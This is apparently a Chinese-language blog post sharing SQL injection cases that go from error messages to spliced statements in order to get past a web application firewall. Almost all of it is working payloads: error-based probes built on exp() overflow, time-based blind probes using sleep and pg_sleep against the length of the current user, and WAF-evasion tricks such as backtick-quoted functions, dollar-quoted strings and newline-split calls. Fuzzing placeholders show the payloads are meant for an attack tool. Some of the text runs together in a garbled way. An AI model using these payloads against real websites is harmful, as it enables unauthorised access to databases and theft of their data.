从报错到拼接语句绕waf的注入

还请各位高抬贵手，别来日我的站了，博客有Ai分析CVE和仓库这是自己搭建的 github AI监控 https://blog.897010.xyz/c/today另外分享几个注入案例

/xx?id=1&code=xx&status=1(select aa) as a FROM table_b where1=1and (( id =''and code ='') ) orderby cc ascfalse'or+exp(709)or'false'or+exp(710)or'/xx?id=1&code=false'or+exp(709)or'&status=1/xx?id=1&code=false'or+exp(710)or'&status=1

{"id":"xx","page":1}select count(*) from ( select id as aa from table_b group by id);user ❌  -->  $$user$$  ✅(selectrpg_sleep(exp(714-length($$user$$)))),1{"id":"(selectrpg_sleep(exp(714-length($$user$$)))),1","page":1}{"id":"(selectrpg_sleep(exp(715-length($$user$$)))),1","page":1}

id=xx'||exp(709)||''||exp(710)||'length ❌  -->  character_length ❌ -->  char_length  ❌  -->  `char_length` ✅version()  ❌ -->  {x(version())}  ✅id='||`cHar_leNGTh`({x(verSion())})!={{int(1-20)}}||'

id=xxuser() ❌  -->  current_user ❌  -->  current_user%0a() ✅id=(sleep(exp({{int(710-740)}}-length(currENT_USEr%0a()))))

id==xxlength ❌-->  character_length ❌-->  char_length  ❌-->  `char_length`false'||`nullif`F({{int(1-10)}},`cHar_leNGTh`(currENT_USErF()))||'"id": "false'||`nullif`F({{int(1-10)}},`cHar_leNGTh`(currENT_USErF()))||'"